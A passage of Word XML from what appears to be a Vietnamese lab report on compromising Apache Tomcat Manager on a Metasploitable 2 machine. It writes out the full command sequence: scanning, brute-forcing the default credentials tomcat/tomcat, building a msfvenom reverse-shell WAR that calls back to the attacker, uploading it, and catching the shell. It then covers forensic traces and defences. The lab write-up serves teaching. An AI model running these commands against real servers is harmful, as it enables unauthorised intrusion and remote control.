        <w:t>msfvenom – tạo payload Web Shell dạng file WAR.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3FB18E55" w14:textId="77777777" w:rsidR="00AC56B5" w:rsidRDefault="00D66574">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:spacing w:after="160"/>
      </w:pPr>
      <w:r>
        <w:t>Trình duyệt web – truy cập giao diện Tomcat Manager để tải lên file thủ công.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19AE39C2" w14:textId="77777777" w:rsidR="00AC56B5" w:rsidRDefault="00D66574">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r>
        <w:t>4. QUY TRÌNH THỰC NGHIỆM</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4BEA8A03" w14:textId="77777777" w:rsidR="00AC56B5" w:rsidRDefault="00D66574">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t>4.1. Kiểm tra kết nối và quét cổng</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7FBD7A50" w14:textId="77777777" w:rsidR="00AC56B5" w:rsidRDefault="00D66574">
      <w:pPr>
        <w:spacing w:after="120"/>
        <w:ind w:firstLine="360"/>
      </w:pPr>
      <w:r>
        <w:t>Trên máy Kali Linux, kiểm tra khả năng liên thông đến máy mục tiêu:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="230A5E7A" w14:textId="3996DA52" w:rsidR="00AC56B5" w:rsidRDefault="00D66574">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F5F5F5"/>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">ping </w:t>
      </w:r>
      <w:r w:rsidR="006B7508">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>attack ip</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5FD73B45" w14:textId="77777777" w:rsidR="00AC56B5" w:rsidRDefault="00D66574">
      <w:pPr>
        <w:spacing w:after="120"/>
        <w:ind w:firstLine="360"/>
      </w:pPr>
      <w:r>
        <w:t>Tiếp theo, sử dụng Nmap để xác nhận cổng Tomcat (8180) đang mở và nhận diện phiên bản:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F09B4CF" w14:textId="244915E4" w:rsidR="00AC56B5" w:rsidRDefault="00D66574">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F5F5F5"/>
        <w:spacing w:after="160"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">nmap -sV -p 8180 </w:t>
      </w:r>
      <w:r w:rsidR="006B7508">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>victim ip</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="126A54E0" w14:textId="77777777" w:rsidR="00AC56B5" w:rsidRDefault="00D66574">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t>4.2. Truy cập giao diện Tomcat Manager</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1446C987" w14:textId="77777777" w:rsidR="00AC56B5" w:rsidRDefault="00D66574">
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:firstLine="360"/>
      </w:pPr>
      <w:r>
        <w:t>Mở trình duyệt trên Kali Linux và truy cập địa chỉ: http://192.168.1.20:8180/. Trang chào mừng của Apache Tomcat xuất hiện. Nhấn vào liên kết “Manager App” để chuyển đến giao diện đăng nhập (thường là /manager/html). Giao diện yêu cầu xác thực Basic Authentication.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7AAE03B3" w14:textId="77777777" w:rsidR="00AC56B5" w:rsidRDefault="00D66574">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t>4.3. Brute-force / dò mật khẩu mặc định bằng Metasploit</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00D0EB0F" w14:textId="77777777" w:rsidR="00AC56B5" w:rsidRDefault="00D66574">
      <w:pPr>
        <w:spacing w:after="120"/>
        <w:ind w:firstLine="360"/>
      </w:pPr>
      <w:r>
        <w:t>Khởi động Metasploit Framework và sử dụng module quét mật khẩu Tomcat Manager:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69D649D5" w14:textId="77777777" w:rsidR="00AC56B5" w:rsidRDefault="00D66574">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F5F5F5"/>
        <w:spacing w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>msfconsole</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5CDB50BD" w14:textId="77777777" w:rsidR="00AC56B5" w:rsidRDefault="00D66574">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F5F5F5"/>
        <w:spacing w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>use auxiliary/scanner/http/tomcat_mgr_login</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64B5383A" w14:textId="4261506E" w:rsidR="00AC56B5" w:rsidRDefault="00D66574">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F5F5F5"/>
        <w:spacing w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">set RHOSTS </w:t>
      </w:r>
      <w:r w:rsidR="002774C3">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>[victim ip]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="173AF38C" w14:textId="77777777" w:rsidR="00AC56B5" w:rsidRDefault="00D66574">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F5F5F5"/>
        <w:spacing w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>set RPORT 8180</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B9DF99B" w14:textId="77777777" w:rsidR="00AC56B5" w:rsidRDefault="00D66574">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F5F5F5"/>
        <w:spacing w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>set TARGETURI /manager/html</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="067D8E8C" w14:textId="77777777" w:rsidR="00AC56B5" w:rsidRDefault="00D66574">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F5F5F5"/>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>run</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19D23F2B" w14:textId="77777777" w:rsidR="00AC56B5" w:rsidRDefault="00D66574">
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:firstLine="360"/>
      </w:pPr>
      <w:r>
        <w:t>Module nhanh chóng tìm thấy cặp thông tin đăng nhập mặc định: tomcat / tomcat và hiển thị thông báo “Successful login”. Cặp tài khoản này được ghi lại để sử dụng ở các bước tiếp theo.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31CE11D7" w14:textId="77777777" w:rsidR="00AC56B5" w:rsidRDefault="00D66574">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t>4.4. Khai thác tự động bằng module tomcat_mgr_upload</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="498F27F1" w14:textId="77777777" w:rsidR="00AC56B5" w:rsidRDefault="00D66574">
      <w:pPr>
        <w:spacing w:after="120"/>
        <w:ind w:firstLine="360"/>
      </w:pPr>
      <w:r>
        <w:t>Sau khi có thông tin đăng nhập hợp lệ, sử dụng module khai thác để tải lên payload tự động:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13FC234B" w14:textId="77777777" w:rsidR="00AC56B5" w:rsidRDefault="00D66574">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F5F5F5"/>
        <w:spacing w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>use exploit/multi/http/tomcat_mgr_upload</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4AE2A673" w14:textId="7ECE34B9" w:rsidR="00AC56B5" w:rsidRDefault="00D66574">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F5F5F5"/>
        <w:spacing w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">set RHOSTS </w:t>
      </w:r>
      <w:r w:rsidR="002774C3">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>[victim ip]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74185813" w14:textId="77777777" w:rsidR="00AC56B5" w:rsidRDefault="00D66574">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F5F5F5"/>
        <w:spacing w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>set RPORT 8180</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64F7C9FC" w14:textId="77777777" w:rsidR="00AC56B5" w:rsidRDefault="00D66574">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F5F5F5"/>
        <w:spacing w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>set HttpUsername tomcat</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="110CB6C5" w14:textId="77777777" w:rsidR="00AC56B5" w:rsidRDefault="00D66574">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F5F5F5"/>
        <w:spacing w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>set HttpPassword tomcat</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2FCC5E76" w14:textId="2F7DEE19" w:rsidR="00AC56B5" w:rsidRDefault="00D66574">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F5F5F5"/>
        <w:spacing w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">set LHOST </w:t>
      </w:r>
      <w:r w:rsidR="002774C3">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>[attack ip]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E50A5DD" w14:textId="77777777" w:rsidR="00AC56B5" w:rsidRDefault="00D66574">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F5F5F5"/>
        <w:spacing w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>set LPORT 4446</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06F7F6B1" w14:textId="77777777" w:rsidR="00AC56B5" w:rsidRDefault="00D66574">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F5F5F5"/>
        <w:spacing w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>set PAYLOAD java/jsp_shell_reverse_tcp</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71BF8AE3" w14:textId="77777777" w:rsidR="00AC56B5" w:rsidRDefault="00D66574">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F5F5F5"/>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>run</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C401535" w14:textId="77777777" w:rsidR="00AC56B5" w:rsidRDefault="00D66574">
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:firstLine="360"/>
      </w:pPr>
      <w:r>
        <w:t>Trong thực nghiệm, module tự động không mở được session shell thành công (có thể do xung đột phiên bản Metasploit hoặc cấu hình môi trường). Do đó, chuyển sang phương pháp khai thác thủ công.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="217A7E14" w14:textId="77777777" w:rsidR="00AC56B5" w:rsidRDefault="00D66574">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t>4.5. Khai thác thủ công – Tạo và tải lên Web Shell</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73438759" w14:textId="77777777" w:rsidR="00AC56B5" w:rsidRDefault="00D66574">
      <w:pPr>
        <w:spacing w:after="120"/>
        <w:ind w:firstLine="360"/>
      </w:pPr>
      <w:r>
        <w:t>Sử dụng msfvenom để tạo file WAR chứa payload reverse shell:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00AC697B" w14:textId="5799E998" w:rsidR="00AC56B5" w:rsidRDefault="00D66574">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F5F5F5"/>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>msfvenom -p java/jsp_shell_reverse_tcp LHOST=</w:t>
      </w:r>
      <w:r w:rsidR="002774C3">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>[attack ip]</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> LPORT=4446 -f war &gt; my_shell.war</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="715748CE" w14:textId="77777777" w:rsidR="00AC56B5" w:rsidRDefault="00D66574">
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:firstLine="360"/>
      </w:pPr>
      <w:r>
        <w:t>Đăng nhập vào Tomcat Manager bằng tài khoản tomcat / tomcat. Tại phần Deploy, chọn file my_shell.war và tải lên. Sau khi triển khai thành công, ứng dụng my_shell xuất hiện trong danh sách Applications trên giao diện Manager.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C90FEB9" w14:textId="77777777" w:rsidR="00AC56B5" w:rsidRDefault="00D66574">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t>4.6. Thiết lập listener và nhận shell ngược</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2188D633" w14:textId="77777777" w:rsidR="00AC56B5" w:rsidRDefault="00D66574">
      <w:pPr>
        <w:spacing w:after="120"/>
        <w:ind w:firstLine="360"/>
      </w:pPr>
      <w:r>
        <w:t>Trên máy Kali, thiết lập listener để chờ kết nối ngược từ Web Shell:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="198E37F3" w14:textId="77777777" w:rsidR="00AC56B5" w:rsidRDefault="00D66574">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F5F5F5"/>
        <w:spacing w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>msfconsole</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00051B74" w14:textId="77777777" w:rsidR="00AC56B5" w:rsidRDefault="00D66574">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F5F5F5"/>
        <w:spacing w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>use exploit/multi/handler</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5EFAF121" w14:textId="77777777" w:rsidR="00AC56B5" w:rsidRDefault="00D66574">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F5F5F5"/>
        <w:spacing w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>set PAYLOAD java/jsp_shell_reverse_tcp</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C015D79" w14:textId="38B8DFC4" w:rsidR="00AC56B5" w:rsidRDefault="00D66574">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F5F5F5"/>
        <w:spacing w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">set LHOST </w:t>
      </w:r>
      <w:r w:rsidR="002774C3">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>[attack ip]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B6BD488" w14:textId="77777777" w:rsidR="00AC56B5" w:rsidRDefault="00D66574">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F5F5F5"/>
        <w:spacing w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>set LPORT 4446</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32C53CA0" w14:textId="77777777" w:rsidR="00AC56B5" w:rsidRDefault="00D66574">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F5F5F5"/>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>run</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53B38A16" w14:textId="77777777" w:rsidR="00AC56B5" w:rsidRDefault="00D66574">
      <w:pPr>
        <w:spacing w:after="120"/>
        <w:ind w:firstLine="360"/>
      </w:pPr>
      <w:r>
        <w:t>Sau đó, trên trình duyệt, truy cập ứng dụng my_shell vừa triển khai. Listener nhận được kết nối và mở session shell. Thực hiện kiểm tra quyền:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29C53E2B" w14:textId="77777777" w:rsidR="00AC56B5" w:rsidRDefault="00D66574">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F5F5F5"/>
        <w:spacing w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>whoami</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0EEEB8BD" w14:textId="77777777" w:rsidR="00AC56B5" w:rsidRDefault="00D66574">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F5F5F5"/>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>ls -l</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7731D837" w14:textId="77777777" w:rsidR="00AC56B5" w:rsidRDefault="00D66574">
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:firstLine="360"/>
      </w:pPr>
      <w:r>
        <w:t>Kết quả xác nhận đã chiếm được quyền thực thi lệnh trên máy victim. Tấn công thành công.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E40A09A" w14:textId="77777777" w:rsidR="00AC56B5" w:rsidRDefault="00D66574">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r>
        <w:t>5. PHÂN TÍCH PHÁP Y (FORENSICS)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="205E2012" w14:textId="77777777" w:rsidR="00AC56B5" w:rsidRDefault="00D66574">
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:firstLine="360"/>
      </w:pPr>
      <w:r>
        <w:t>Sau khi tấn công, kiểm tra log và thư mục trên máy Metasploitable 2 cho thấy dấu vết rõ ràng. File Web Shell được tải lên nằm tại thư mục:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56010A23" w14:textId="77777777" w:rsidR="00AC56B5" w:rsidRDefault="00D66574">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F5F5F5"/>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>/var/lib/tomcat5.5/webapps/my_shell.war</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00EEB204" w14:textId="77777777" w:rsidR="00AC56B5" w:rsidRDefault="00D66574">
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:firstLine="360"/>
      </w:pPr>
      <w:r>
        <w:t>Việc tồn tại file WAR lạ trong thư mục webapps của Tomcat là bằng chứng quan trọng trong phân tích pháp y. Ngoài ra, log truy cập của Tomcat và log hệ thống cũng ghi nhận các kết nối từ địa chỉ IP máy tấn công, thời điểm đăng nhập Manager và thời điểm triển khai ứng dụng.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="602FFA00" w14:textId="77777777" w:rsidR="00AC56B5" w:rsidRDefault="00D66574">
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:firstLine="360"/>
      </w:pPr>
      <w:r>
        <w:t>Những dấu vết này cho phép người quản trị phát hiện xâm nhập, xác định thời điểm tấn công và có thể truy vết nguồn gốc nếu hệ thống giám sát log được cấu hình đầy đủ.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B96B4D5" w14:textId="77777777" w:rsidR="00AC56B5" w:rsidRDefault="00D66574">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r>
        <w:t>6. BIỆN PHÁP PHÒNG THỦ VÀ BÀI HỌC KINH NGHIỆM</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4FA424B9" w14:textId="77777777" w:rsidR="00AC56B5" w:rsidRDefault="00D66574">
      <w:pPr>
        <w:spacing w:after="120"/>
        <w:ind w:firstLine="360"/>
      </w:pPr>
      <w:r>
        <w:t>Dựa trên thực nghiệm, một số biện pháp phòng thủ quan trọng được rút ra:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6721A2C6" w14:textId="77777777" w:rsidR="00AC56B5" w:rsidRDefault="00D66574">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Không sử dụng mật khẩu mặc định. Đặt mật khẩu mạnh, phức tạp cho tài khoản Tomcat Manager và các tài khoản quản trị khác.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="106E7068" w14:textId="77777777" w:rsidR="00AC56B5" w:rsidRDefault="00D66574">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:t>Hạn chế truy cập Tomcat Manager: chỉ cho phép từ địa chỉ IP nội bộ tin cậy hoặc thông qua VPN; không mở Manager ra Internet.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77DAFD86" w14:textId="77777777" w:rsidR="00AC56B5" w:rsidRDefault="00D66574">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:t>Vô hiệu hóa hoặc gỡ bỏ Tomcat Manager nếu không thực sự cần thiết trong môi trường production.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="273D0347" w14:textId="77777777" w:rsidR="00AC56B5" w:rsidRDefault="00D66574">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:t>Giám sát thư mục webapps và log Tomcat để phát hiện việc triển khai ứng dụng bất thường.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6AB38F89" w14:textId="77777777" w:rsidR="00AC56B5" w:rsidRDefault="00D66574">
      <w:pPr>
